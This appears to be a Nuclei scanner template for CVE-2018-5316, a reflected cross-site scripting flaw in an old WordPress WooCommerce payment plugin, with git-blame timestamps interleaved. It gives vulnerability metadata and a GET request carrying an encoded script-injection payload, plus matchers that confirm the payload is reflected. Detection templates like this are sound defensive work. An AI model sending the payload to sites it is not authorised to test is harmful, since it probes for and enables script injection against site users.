2021-07-15 17:16:27 +00:00
id : CVE-2018-5316
info :
2022-08-12 00:45:50 +00:00
name : WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting
2021-07-15 17:16:27 +00:00
author : daffainfo
severity : medium
2022-08-12 00:45:50 +00:00
description : WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://wordpress.org/support/topic/sagepay-server-gateway-for-woocommerce-1-0-7-cross-site-scripting/#post-9792337
- https://wordpress.org/plugins/sagepay-server-gateway-for-woocommerce/#developers
- https://packetstormsecurity.com/files/145459/WordPress-Sagepay-Server-Gateway-For-WooCommerce-1.0.7-XSS.html
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-5316
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-5316
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : cve2018,wordpress,xss,wp-plugin,woocommerce,packetstorm,cve
2021-07-15 17:16:27 +00:00
requests :
- method : GET
path :
2021-07-19 06:02:30 +00:00
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-15 17:16:27 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-07-19 06:02:30 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-15 17:16:27 +00:00
part : body
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-08-12 00:45:50 +00:00
# Enhanced by mp on 2022/08/10